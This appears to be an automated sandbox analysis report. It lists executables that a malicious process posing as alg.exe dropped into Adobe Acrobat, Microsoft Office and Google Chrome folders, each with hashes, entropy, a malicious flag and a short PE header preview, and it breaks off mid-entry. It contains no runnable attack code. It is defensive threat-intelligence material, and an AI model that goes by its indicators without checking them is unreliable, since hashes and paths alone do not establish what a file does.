Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1161728
Entropy (8bit):	5.047154946706352
Encrypted:	false
SSDEEP:	12288:T0Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:YsqjnhMgeiCl7G0nehbGZpbD
MD5:	2AA2B321F6C0EBC47546A58AD1C094EF
SHA1:	1DD8CD25807476F897A12D6C59B4BA89B2FE9555
SHA-256:	BB2E250A7D907368D0FB6DEBC0DDB4F10A6A15E8C96CF172B58D9B0154C99180
SHA-512:	624370401FE81169FB86C339597A5D20F658FCCF7DD4B66CE6E309B8EC23130429F4C13561E1B067A7F21B4524D525A36975858459B09BEFFD03F409D8A9EB0D
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2\.v=..v=..v=...E?.x=..I..\|=..I..u=..I..j=..I..p=..bV..q=..v=...=..I..t=..IS.w=..v=;.w=..I..w=..Richv=..........................PE..d....^.c.........."......<...B.......>.........@.......................................... ..................................................i..........P.......,...................`X..T............................X..8............P...............................text....;.......<.................. ..`.rdata..$'...P...(...@..............@..@.data................h..............@....pdata..,............l..............@..@.rsrc...P............r..............@..@.reloc...P.......@...z..............@...........................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4151808
Entropy (8bit):	6.4997746839974
Encrypted:	false
SSDEEP:	49152:ptuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755xDmg27RN:pjEIa4HIEWOc53D527BWG
MD5:	01D0F49F8BA2FA0F5A620F28D777696A
SHA1:	B9765C299480AB4F1AE2CB2F68AAFC7A60FD1CCC
SHA-256:	4E79EFBC874DEB26557F718B36B42368F89715BDD1371A925EFA248E96E75DAC
SHA-512:	7D243E9285C5815A4E4076F5FD156CB80D38E6B9C51E6C90C0BD1A680B079D3CB34FB6893FE513DF704D17AC910F73BC9C620194A8DFD467987F3854470130B1
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.....d.?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	59941376
Entropy (8bit):	7.999367298596945
Encrypted:	true
SSDEEP:	1572864:tQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:mXhwMhe6AABPiQwF6xQ22R
MD5:	06489D827269451A21EBBBBF12DE6318
SHA1:	4FD426362F543B40634A6916C3B6F6C9ED5B1065
SHA-256:	BBCEBCBF9B941A74ADB36212808E4B61A3E70D6FF6684DD388E25537E9444C46
SHA-512:	DCD000F34EB1F2DEF05346134D44C522A2C576E25274FADCDEE6A7EA48D02894A8D5040E82630C19A9785B23D1A0C381DE4A4D9DE1C2E7E11FE66AC9BC27BC88
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0......S..... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1230336
Entropy (8bit):	5.185590752642087
Encrypted:	false
SSDEEP:	12288:MejVWYUA0Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:djkY70sqjnhMgeiCl7G0nehbGZpbD
MD5:	49AD39B3C60F0A352231D5D511DD0939
SHA1:	EDD3B93360E99D50F3352826F3C85025C72836DE
SHA-256:	B557000712C6BDDA8A1D522DAA24DEFD3BA4EA5581BE36A4ED74B8E3BDF6739A
SHA-512:	BB2D1E904FD62F6D57D798E11171D07E06D88F3C95285786D38EE47195D27DAFE9FE83D59EA2E0BF0CFBCB339E62F64C472F80388C363F00C2CE3C05D2DA6C57
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................b....6......6......6.....6.....................M..4......4......4........f....4.....Rich...........................PE..L.....{d.................&...`...............@....@..................................L.......................................r..,................................... O..p....................P.......O..@............@..4............................text....%.......&.................. ..`.rdata...@...@...B...*..............@..@.data................l..............@....rsrc................p..............@..@.reloc...`.......P...v..............@...................................................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1384960
Entropy (8bit):	5.3778114519640665
Encrypted:	false
SSDEEP:	24576:rxwSJhkrmZsQsqjnhMgeiCl7G0nehbGZpbD:ry+krKsMDmg27RnWGj
MD5:	055DC4CCEAD9BCC25CA0F9DFDD1D4480
SHA1:	AA6992F2741111A47C88EB8671BFA07C1B10D3B7
SHA-256:	8ABE3ADEF177466DB5C23BFD97E771106D740D027FF0DC5C9A62FC0493AD1B06
SHA-512:	A6C6C1C4A1DD7E3A2C10ACA493EE6DC8FC468091C83B2FDAE0F8855AE40185C5AEC58408E234F65F8576DBF2B75DD41CB189327174EC56FB37DD039D2B1EB878
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................y...5.......5.....5......7.......................7.....7.Z....2...7.....Rich..........................PE..d.....{d.........."..........<.......&.........@....................................9D.... .................................................`...x.... ..............................`j..p....................l..(....j..8............................................text...l........................... ..`.rdata..............................@..@.data...4#..........................@....pdata........... ..................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc...P...0...@..................@...................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1649152
Entropy (8bit):	5.63273275575142
Encrypted:	false
SSDEEP:	24576:vHQJLIRgvsnNRsqjnhMgeiCl7G0nehbGZpbD:vHQJL34lDmg27RnWGj
MD5:	6A83F760517BD576D24CD71094379E4E
SHA1:	D1649D94334472ECECEB55A38580C20CFB69B428
SHA-256:	2DFD070275139E21BF5B9FACFA3C61A11CA5AE1412D50CD4369C0000CB15D1AB
SHA-512:	6148491C7224D9A6F981FFDD8E7AEC510EEAD4D4F49A21319AC1E5C88EE6194A28112CD5293721B59983A28B68A4775248C7EFEB2E2E47477DC77D1185D3F447
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L<."o."o."o...o.."o+.&n.."o+.!n.."o+.#n."o+.'n."o..$n."o..#n.."o).+n.."o.#o;."o).'n."o)..o."o). n."oRich."o........PE..d......d.........."......\.....................@...................................._..... .................................................."..@....0...........W..................x...T.......................(...`...8............p..........`....................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....^...P...R...2..............@....pdata...W.......X..................@..@.didat..8...........................@....msvcjmc..... ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5365760
Entropy (8bit):	6.450971742398462
Encrypted:	false
SSDEEP:	49152:eUZujDjDjDjXmXgoz2PsapFQrC7dRpqbeE8U2IzwDt+bdro4O8b8ITDnlggyJ1kQ:hWmXL6DEC7dRpKuDQbgiD527BWG
MD5:	43F2AECB5943DAA3691867C7CC73B415
SHA1:	EE8749DA82124D2E931B9652435F3C43126CE8D6
SHA-256:	5389980F12DB561C4710132074AE4B644B25D007C114BD473F3CC4588D1E02A5
SHA-512:	FEB16BB4C20C8FFD4A4DC23E355440FFDDC709EF8E7D36477D97C7D53C71665D294F492AC4E05E2BABAF98D47001386734BA3D137AFAB8A192D1279939970402
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........I.~.(g-.(g-.(g-.Cd,.(g-.Cb,i(g-.G.-.(g-b\c,.(g-b\d,.(g-.t.-.(g-.(g-C(g-b\b,.(g-.Cc,.(g-.Ca,.(g-.Cf,.(g-.(f-.+g-`\b,.(g-`\g,.(g-`\.-.(g-.(.-.(g-`\e,.(g-Rich.(g-........PE..L......d.........."......./..p......P"%.......0...@...........................R......3R..............................@:......@:.......;..V...........................^6.T...................._6.....h.5.@.............0...... :.`....................text...*./......./................. ..`.rdata..Ze....0..f....0.............@..@.data....E....:......h:.............@....didat........;......B;.............@....rsrc....V....;..X...H;.............@..@.reloc...P...@G..@....F.............@...........................................................................................................................................................................................................................

C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3163136
Entropy (8bit):	7.972781382029088
Encrypted:	false
SSDEEP:	98304:prZ23AbsK6Ro022JjL2WEiVqJZRD527BWG:dJADmmxL2WEoCZRVQBWG
MD5:	9C8B185A46A07A5C3080AA519BFDB611
SHA1:	C68900AA3ED3A5350A1F33A537E7BFCFC469AABC
SHA-256:	E8C399D85E0828795CC53E03617FED563DD6AF7BB91CCB9E322A38A63F5DFCE8
SHA-512:	09D39266341B56DEB8CD1585677745C719DC6002B190724CEAE67E386DFB99E69BB279B31A4DD297F010EA9ADD9CB3127E35EF4B442C71C938859CB4A2DF95A7
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5{.!q..rq..rq..rq..r...rQc.r`..rQc.r`..rQc.rp..rQc.rp..rRichq..r........................PE..L.....A.................~... .......^... ........... ........................1......#1.......... .....................................0............................!............................................... ...............................text....\|... ...~.................. ..`.data...............................@....rsrc...../......./.................@...................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1213440
Entropy (8bit):	7.2049123190883115
Encrypted:	false
SSDEEP:	24576:TfrYY42wd7hlOw9fpkEE64AsqjnhMgeiCl7G0nehbGZpbD:Sz9xrS8Dmg27RnWGj
MD5:	639356166764193D980935954AA874AB
SHA1:	D8AFBB614F154F225601AAE6F847E1360CE7F048
SHA-256:	6FA485A620E4EC81F275303965C6D72E3D89C6984CD2E1E1D2E66DDCDA899B93
SHA-512:	5F58CBFCE2DEC55B3AF8B516C142D87E99579EBDB775E192D271677FBC69568A654F44049CE425326D12B8624FB3D865F894399E3FC8178897FA1049B6D77D79
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......T...T...T...U...T...U...T..U...T..U...T...U...T..U...T...U...T...Tf..T..U...T..T...T..uT...T..U...TRich...T................PE..d.....{d..........#......J...........3.........@............................. ............ ..................................................L.......`..........(J..................p...T.......................(... B..8............`.......I..`....................text....H.......J.................. ..`.rdata..d....`.......N..............@..@.data...(w...p...&...^..............@....pdata..(J.......L..................@..@.didat.......@......................@..._RDATA.......P......................@..@.rsrc........`......................@...................................................................................................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1388544
Entropy (8bit):	5.2729212974525295
Encrypted:	false
SSDEEP:	12288:PwkNKiZ+R2GGNUbTF5zXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/T:PzNKUE5zsqjnhMgeiCl7G0nehbGZpbD
MD5:	AC8C484238D5C7F4EEE7C9D407A53026
SHA1:	8736E82DE158C9D403303684DC6D0EF55D9403FC
SHA-256:	3044534674EE47C30BCD10A94A84E07B89CE8EFA072F091CAB8BFE5619D219C4
SHA-512:	AB32C28A6F9397C26F1C37CE507DD406672D85F2D330F7F073E871644A896B15979627B55DE6066EC0B9A971E81FEFC8A6EAB1B905F03EC26647C1BC86F7CBA4
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E@..$...$...$...\...$...V*..$...V-..$...V+..$...V/..$...$/.0 ...V&..$...V..$...V..$...V,..$..Rich.$..........PE..d...!!.R.........."......`..........0C.........@.............................P.......P.... .......... ......................................Xl..........X.......d.......................T...................8...(.......8...........`...`............................text...(X.......`.................. ..`.rdata..z....p... ...p..............@..@.data...............................@....pdata..d........ ..................@..@.rsrc...X...........................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5855744
Entropy (8bit):	6.574332552414844
Encrypted:	false
SSDEEP:	98304:kALuzDKnxCp3JKNrPJzruaI6HMaJTtGb+D527BWG:3aGg3cFPIaI6HMaJTtGb+VQBWG
MD5:	C8432AEB57641B691499733F8B07B239
SHA1:	E4636893864CD7F220D0B6064D454BD0FC08D368
SHA-256:	2F2C66BA0E6E8846451904181806DE1BAF33D71E258AA2549F030A3483133D86
SHA-512:	C5E20742CAE8120EFB73D6F73A3D12672D2D263DFA3F04FD64E1A3AE1DA2A3B1D6496096078EBDC88CD580D0406CF35C5746B31196EB29CC1B03857031AE88B6
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......Jc.M.............p......nx......nx......).......)........p.......p.......p..&....p..............nx..i...kx......kx......kx..g...kxx.............kx......Rich....................PE..d....".e..........".... .z6..........32........@..............................Y.......Y... .................................................8.B.......K..a...PI..%..................0.B.8...................X.B.(.....7.@.............6.0.....B......................text....y6......z6................. ..`.rdata..5.....6......~6.............@..@.data...`....0G.......G.............@....pdata...%...PI..&...:I.............@..@.didat.. .....K......`K.............@..._RDATA..\.....K......fK.............@..@.rsrc....a....K..b...hK.............@..@.reloc........P.......O.............@...................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1312768
Entropy (8bit):	5.3560624086643065
Encrypted:	false
SSDEEP:	24576:bXr/SVMxWcsqjnhMgeiCl7G0nehbGZpbD:v1xRDmg27RnWGj
MD5:	23484064ED64487D783EA316AD6F50C6
SHA1:	B471F3FE91D93A5AABA0A3731FF24315AFBD88FB
SHA-256:	5D68BED3724DDFD715DDF0E23A1776830FF598525B3247D9E86E907DEFD38266
SHA-512:	B7AF36099200B497B939758D0DDB44795BDC2859BD62BF00A209B7AF80B3EF27B7B676C02BBA3F97C2F4FA4534064CBF5B6872A49558465B15CA09F81D915923
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.k...k...k.......k.......k.......k.......k...k..Ro.......k....l..k.......k....n..k.......k..Rich.k..........PE..L...9.A/.....................T......@V............@..........................P.......!........... ......................................8............................_..T...............................@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...8...........................@..@.reloc...p.......`..................@...........................................................................................................................................................................................................................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	27533312
Entropy (8bit):	6.248635805472331
Encrypted:	false
SSDEEP:	196608:xhRrmpGpGdJM7Hbp8JfrCGvqYYuNDmoefAlprtPz25HqaI6HMaJTtGbQOyVQBWG:xhRCpGpMJMrbp8JjpNdNlc5+B
MD5:	0DEEFC8BA5CEA00ABBEA78889A53655F
SHA1:	5461CC49FBD474A268BEBAD59FE8919507EDB1D0
SHA-256:	62FAC58EDB25E64AE55EB30ADB67BBBFA756387C5060DF6520D475B20D92D364
SHA-512:	0C9B30123B6E1897A6561BC895BE1BCB21FBC740E1863E0DA62BD7E16F75063B30EF43DE5DEBB0ABABCC05812FBB5133349133C058B3E232B07A3A82C9338DD4
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......$.\|+`{.x`{.x`{.xi..xv{.x...yf{.x...yj{.x...yd{.x...yO{.xG..xh{.xG.oxa{.x...yb{.x...ya{.x...ya{.x...yd{.x...yc{.x...y~{.x...y}{.x`{.xTs.x...ya{.x...yjz.x...y v.x...xa{.x`{.xa{.x...ya{.xRich`{.x........PE..d......e..........".... .....H.................@.......................................... ..................................................u..D.... ?...X...7.........................8....................U..(...`...@............0.. "..l .......................text............................... ..`.rdata..S.~..0....~.................@..@.data.........1.......0.............@....pdata........7.......7.............@..@.didat..`.....>.......>.............@....detourc.!....>.."....>.............@..@.rsrc.....X.. ?...X...>.............@..@.reloc..............................@...........................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2199552
Entropy (8bit):	6.78899719599009
Encrypted:	false
SSDEEP:	49152:983pZ3kd0CuEeN0LUmRXzYs65mKDmg27RnWGj:dKuUQY151D527BWG
MD5:	61F2C2E3351FE09F66843E7108586471
SHA1:	38B6F2FE6E5F3630BAB80BDB2A7B42F62273F1FC
SHA-256:	7BE63F52976BDB3478B85C68162A21F9493C0B50193451261A7C8EDCA6DC1992
SHA-512:	B103AFB1950FAC9A1D18B336E5A43FB95322E1E619227E12055E16A2C498BAC2E6AAB1CA0BD4510E789D3C215F1C01B59F6E4889610C5E24976D5D424FFA9D00
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D................7......................!..............~............Y.......[............Rich............PE..d...rq............"..................$.........@..............................!.......!... .......... ......................................P...\|....p... ......L....................a..T...................Xt..(... s..8............t...............................text...6........................... ..`.rdata..............................@..@.data...@...........................@....pdata..L...........................@..@.rsrc.... ...p...0...P..............@..@.reloc... ..........................@...................................................................................................................................................................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4971008
Entropy (8bit):	6.670833355869255
Encrypted:	false
SSDEEP:	49152:lErw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGOpndOPcptz6+Mp:zA4oGlcR+glEdOPKzgVZoD527BWG
MD5:	86F545A8FA4673968EECFF91653F62FC
SHA1:	EF717CFEE4E32D12C6302E53262C2FF8DC3D216A
SHA-256:	6120EEC4BDAD419FA70009C8B6351A70053BF7A118CB21EC0046B80D951C17CB
SHA-512:	28DB643B4FDD868D7AD562F66D4C5E630245DE6D5ED9E8B95201E4BEF468DEAA3323472B40EECA9269FC08476A0F71504D95B50B913D6F9EA688A883E31D6331
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Eh.<..{o..{o..{o.q.o..{oaszn..{oas~n*.{oas.n..{oasxn..{o.{}n..{o.{xn..{o.{.n..{o.{zn..{o..zo..{odsxn..{ods~n..{odsrnF.{ods.o..{o...o..{odsyn..{oRich..{o........PE..d...0m.d..........".... ..-.........0p+........@..............................L.......L... .................................................HZ:.......B.......@.<C....................:.8...................p.9.(... P..@.............-......H:.@....................text...[.-.......-................. ..`.rdata..9.....-.......-.............@..@.data...x....`>......>>.............@....pdata..<C....@..D....@.............@..@.didat..`.....B......LB.............@....rsrc.........B......PB.............@..@.reloc........B......ZB.............@...........................................................................................................................................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4897792
Entropy (8bit):	6.829766344461206
Encrypted:	false
SSDEEP:	49152:t8ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKe:Iv2gM+qwXLg7pPgw/DSZHaD527BWG
MD5:	ADD0D6A390899C81A749834A63D4723F
SHA1:	61237C7E736ED0132EB8FC16983768ABF7D1EF1D
SHA-256:	014F2A5C6919EA31025E0843C6610834B9D3F49A3F1AE71C8D28BC1B86BC4427
SHA-512:	E9E69C46BA2A825579AF71B2461CFE48E178E5C1D58A3B1D70B699ADAC10C2ED6BEC19030297B989AD0D65E2CEE3C1CD670A9E5E5E5E0AF857DE682C6EB7B2E3
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."......D/......... ..........@..............................L.....i.J... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4897792
Entropy (8bit):	6.829765160584648
Encrypted:	false
SSDEEP:	49152:o8ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKe:zv2gM+qwXLg7pPgw/DSZHaD527BWG
MD5:	AC17B46AB05C0DDDF57AAA9219227CDB
SHA1:	98CDD5F6447551B1AF0C8094D4CEEAA8B84A6920
SHA-256:	B5481E33AB3A9F4152A4ED4BFA4411C9F795991485F7C364568DB241A980F585
SHA-512:	768590550208C56ED5723F05A51C4FB75900968E8B899F74C714109063C248E531AD796FC459EC1BFF07BC3B5888157D1D9595120889B06365512303A4C55ABA
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."......D/......... ..........@..............................L.......J... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2156544
Entropy (8bit):	6.95357402618607
Encrypted:	false
SSDEEP:	24576:wtjqL8fH+8aUbp8D/8+xyWApsqjnhMgeiCl7G0nehbGZpbD:8jKK+81FI/8zbDmg27RnWGj
MD5:	F297876CF2E1E89EB3A7A8D327EA100C
SHA1:	D05EEB9E2730B8DAA9230E6CEC94DFEAD6774947
SHA-256:	2B43DB9AD28FD3C5CDB466D5AA1C59EDD49129E13B3CD745651B15DD9C3FD663
SHA-512:	A38FCEC82B913847D9DEA03DC1B694C8C26D420F836F1879141C8727950EA8DFACC5B2DCB0B044D1BB90D4A91DC8913B4EE4DBDBDB08A63F15F8E47E444B4289
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."......F.....................@.............................P"......!... ..........................................X..\...$Y....... ...&......(...................lM......................PL..(...pr..@............_...............................text....D.......F.................. ..`.rdata..$....`.......J..............@..@.data...,.... ......................@....pdata..(...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h............................ ..`.rsrc....&... ...(..................@..@.reloc.......P......................@...................................................................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2370560
Entropy (8bit):	7.032388104396015
Encrypted:	false
SSDEEP:	49152:KAMsOu3JfCIGnZuTodRFYKBrFDbWp9Dmg27RnWGj:KAMa38ZuTSoD527BWG
MD5:	68BC1F22379C76D8591A3549FD33B16D
SHA1:	FD9311E55AECE8CD1421073B09783A54F261E6FF
SHA-256:	CD3FABD39DFB0F16A4B420E9FC3C1C39BA94C9B5095D50D894838CC0740B2B88
SHA-512:	B97F7F0329AACE7789973BA1D3CCFFF5D6CF5EB768F83D2AC3854559665C84712E51ABCD241CDCD9A34A0E748E98C6F24C9ECD199B00C7B960E61B4EDE31B980
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e..........".................0..........@..............................%.......$... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1984512
Entropy (8bit):	7.104340353534792
Encrypted:	false
SSDEEP:	24576:xwbK7tnhD4aH6wD2Krx5NgOOagQE8JdsqjnhMgeiCl7G0nehbGZpbD:xSK7Fhslq2EPfOGEsDmg27RnWGj
MD5:	41727798D7F9CD8C19B2B3C98C09A4D0
SHA1:	49E502789E204A6DCF67B45AD4181B3FBCC747B9
SHA-256:	89C6FF4D43FEAD3B85D44249F28523EF1CC57A3DB60FDE95598022F450B9DB8E
SHA-512:	3DD10CA3E0E7774ACDCF3F238B26053DD4DB1B4B0BA5F49CF792D80152E714C4DA7B5D4F96C76E1C6411786417EC4638FDD7E385AF551E9D74F78E8FEFF4B02C
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."............................@....................................9..... ............................................\...$................p..t...............................................(...P...@...........x...x............................text............................... ..`.rdata..............................@..@.data................z..............@....pdata..t....p.......x..............@..@.00cfg..0...........................@..@.gxfg...@-... ......................@..@.retplne.....P.......D...................tls.........`.......F..............@...CPADinfo8....p.......H..............@..._RDATA..\............J..............@..@malloc_h.............L.............. ..`.rsrc................N..............@..@.reloc...............X..............@...................................................................................................

C:\Program Files\Google\Chrome\Application\chrome_proxy.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1779712
Entropy (8bit):	7.158068051224507
Encrypted:	false
SSDEEP:	24576:zKI7Twj5KDHxJ1FxyD+/wsG18bbQtsqjnhMgeiCl7G0nehbGZpbD:zv7e0j31mD+/wDGbWDmg27RnWGj
MD5:	65C89D53C582A2957A90701EB3995C6E
SHA1:	A24985AC48C7206F4B028E69FADB2F91D480D8AD
SHA-256:	EFA76A54EA967FC7E5C36F7A8368DB66CBE55A53BBAC19E872BA8F7ABA4CA80B
